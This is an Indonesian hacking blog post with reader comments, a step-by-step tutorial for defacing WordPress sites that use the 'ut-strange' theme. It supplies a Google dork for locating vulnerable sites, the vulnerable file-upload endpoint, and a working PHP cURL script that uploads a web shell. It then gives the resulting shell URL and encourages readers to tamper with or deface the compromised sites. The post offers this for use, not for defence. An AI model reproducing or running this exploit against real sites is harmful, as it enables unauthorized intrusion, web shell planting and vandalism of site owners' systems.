Wednesday 27 January 2016

Deface dengan Exploit Wordpress Theme Strange File Upload


Hallo Fans, Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi.
lg sibuk urus masadepan *asiikk wkwkwk

untuk artikel hari ini saya akan share salah satu bug/celah web berbasisCMS Wordpress :D
kali ini Nue akan share Exploit Tutorial deface dengan WordPress Theme Strange File Upload ,  etthoo,, ini exploit gak begitu baru loh .. *exploit lama wkwk

hahaha iseng2 aja share kali aja masih crotz  *yang dah master, minggir dlu yak :'(


bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 


Lansung intip Tutorialnya ;*
Edited By: OepilCore




Exploit Title : Wordpress Theme Strange File Upload / File Deletion
Exploit Author : NULL_Pointer
Contact : https://www.facebook.com/xenith.gianni
Date : 21/09/2014
Github Mirror : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/ut-strange
Version : 3.1
Google Dork : inurl:/wp-content/themes/ut-strange/
Tested on : Linux, Windows 7
--------------------------------------------------------------

Dork: inurl:wp-content/themes/ut-strange/
(sisanya kembangin sendiri mz, biar dpt yg vuln and verawan ;* )

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: 
/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php

3. Vulnerability ~ Blank Page


Horee xD ~

4. Buat File Baru Berekstensi .php Contoh utstrange.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn utstrange.php tadi

Code PHP :

<?php
$url = "www.target.co.li/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php"; // put URL Here
$post = array
(
"file_upload" => "@shellpunyalo.php",
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>



(kalo mau pake code HTML bisa ke sini: Touch Me Senpai ;')

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD,dan akan keluar lengkap link akses shell ente



8. Shell Akses: 
www.target.co.li/wp-content/themes/ut-strange/addpress/includes/namashell.php


Done xD ~ xixixhi :v


Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))


Gans aned ;*




bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks toReza Blog | 0 day | aAn




./Nuenomaru

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

9 comments

This comment has been removed by the author.
This comment has been removed by the author.

bro kok pas "C:\xampp\php\anjay.php" malah muncul "Could not open input file:anjay.php",itu knapa bro?

maaf , silahkan tanyakan Lewat OA Line kami saja ya bang :)

#Nuenomaru

mas bro. gimana itu pake yg exploit html nya ya.? pc saya ga support xampp. :d

silahkan cari CSRF online nya saja om awkkwa
#Nuenomaru

http://0day.today/exploit/22674?m=1 link mati


EmoticonEmoticon